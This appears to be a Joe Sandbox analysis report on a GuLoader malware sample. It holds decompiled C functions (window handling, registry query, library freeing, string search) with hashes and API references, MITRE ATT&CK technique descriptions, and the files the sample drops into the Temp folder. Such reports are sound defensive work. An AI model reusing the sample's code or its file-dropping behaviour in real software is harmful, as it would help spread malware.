Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
Instruction ID: 88099082ea7d1cc716486b810d419c96650c49a7fc0f2dc261fb7bb284c478c3
Opcode Fuzzy Hash: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
Instruction Fuzzy Hash: AEF08230502620AFC2216F50FD0898B7F78FB40B52745C47BF145F15A8CB3C09828B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004054F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004054F0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x7a1f34 != _t16) {
							_push(_t16);
							_push(6);
							 *0x7a1f34 = _t16;
							E00404EB1();
						}
						L11:
						return CallWindowProcW( *0x7a1f3c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E31(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044C2(0x413);
				return 0;
			}

0x004054f4
0x004054fe
0x0040551a
0x0040553c
0x0040553f
0x00405545
0x0040554f
0x00405550
0x00405552
0x00405558
0x00405558
0x00405562
0x00000000
0x00405570
0x00405527
0x0040555f
0x0040555f
0x00000000
0x0040555f
0x00405533
0x00405535
0x00000000
0x00405535
0x00405504
0x00000000
0x00000000
0x0040550b
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040551F
CallWindowProcW.USER32(?,?,?,?), ref: 00405570

Part of subcall function 004044C2: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4

Strings

, xrefs: 00405500

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
Instruction ID: 9d4fd90c1d1287ad01f41678c6dcc1ca6f3bae65868fe0495ea0105890a895ad
Opcode Fuzzy Hash: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
Instruction Fuzzy Hash: CC01BC71100648BFEF209F11ED80A9B3B27FB84390F548037FA057A2E5C77A8D529A69

Uniqueness

Uniqueness Score: -1.00%

Function 004063E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004063E8(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E00406387(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x004063f6
0x004063f8
0x00406410
0x00406415
0x0040641a
0x00406458
0x00406458
0x0040641c
0x0040642e
0x00406439
0x0040643f
0x0040644a
0x00000000
0x00000000
0x0040644a
0x0040645e

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,007A0F28,00000000,?,?,Call,?,?,0040664F,80000002), ref: 0040642E
RegCloseKey.ADVAPI32(?,?,0040664F,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 00406439

Strings

Call, xrefs: 004063EF

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 998e79ef7726f2f5777b90a8cc8b3066c283ada07cb0ab9722e08f3c700fe3cb
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: D1017C72500209AEDF219F51CC09EDB3BB9EB54364F11803AFD1AA2191D738D968DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403B34 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B34() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x79ff0c; // 0xa2f438
				_t3 = E00403B19(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x79ff0c =  *0x79ff0c & 0x00000000;
				return _t3;
			}

0x00403b35
0x00403b3d
0x00403b44
0x00403b47
0x00403b47
0x00403b49
0x00403b4e
0x00403b55
0x00403b5b
0x00403b5f
0x00403b60
0x00403b68

APIs

FreeLibrary.KERNEL32(?,76F1FAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403B0C,00403A3B,?), ref: 00403B4E
GlobalFree.KERNEL32 ref: 00403B55

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B34

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3936084776
Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
Instruction ID: 695255c2ecde24bf448a41ac97d2e3a141eb08f66f7233a7170c0cf0b0d44fd9
Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
Instruction Fuzzy Hash: A0E0123390112057C6215F55FE04B5AB77D6F45B26F05403BE980BB2618B786C428BDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405F6F Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F6F(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405f7f
0x00405f81
0x00405f84
0x00405fb0
0x00405f89
0x00405f92
0x00405f97
0x00405fa2
0x00405fa5
0x00405fc1
0x00405fa7
0x00405fae
0x00000000
0x00405fae
0x00405fba
0x00405fbe
0x00405fbe
0x00405fb8
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F97
CharNextA.USER32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA8
lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: d1bddae3a0f18f97ac1aa465d67762edc6f3aabfb23b395e61e0e19fb30ac715
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 50F0C231205414FFD7029FA5DE049AFBBA8EF06250B2140BAE840F7310DA78DE019BA8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report aSsc9zh1ex

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dll

C:\Users\user\AppData\Local\Temp\AsSQLHelper.dll

C:\Users\user\AppData\Local\Temp\CoverDes.exe.manifest

C:\Users\user\AppData\Local\Temp\Strepera.wad

C:\Users\user\AppData\Local\Temp\emblem-default-symbolic.symbolic.png

C:\Users\user\AppData\Local\Temp\face-crying.png

C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp\System.dll

C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Windows Analysis Report
aSsc9zh1ex

Function 0040350A Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 450
stringfilecomCOMMON

Function 004056BB Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 732D1BFF Relevance: 25.1, APIs: 13, Strings: 1, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Function 00405C26 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148
filestringCOMMON

Function 00406850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00403F77 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403BC9 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161
COMMON

Function 0040557C Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Function 00406877 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405A4B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 732D1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 00406039 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Function 732D2A7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21
memoryCOMMON

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 004068E7 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 0040600A Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00405FE5 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Function 00405AC8 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 732D2B98 Relevance: 1.6, APIs: 1, Instructions: 143
fileCOMMON

Function 0040608D Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 004060BC Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 004044C2 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Function 004034C2 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 004044AB Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Function 00404498 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Function 732D12BB Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Function 00404967 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129
comCOMMON

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Function 00404EE3 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Function 00404635 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Function 00406160 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
memorystringCOMMON

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Function 00406557 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON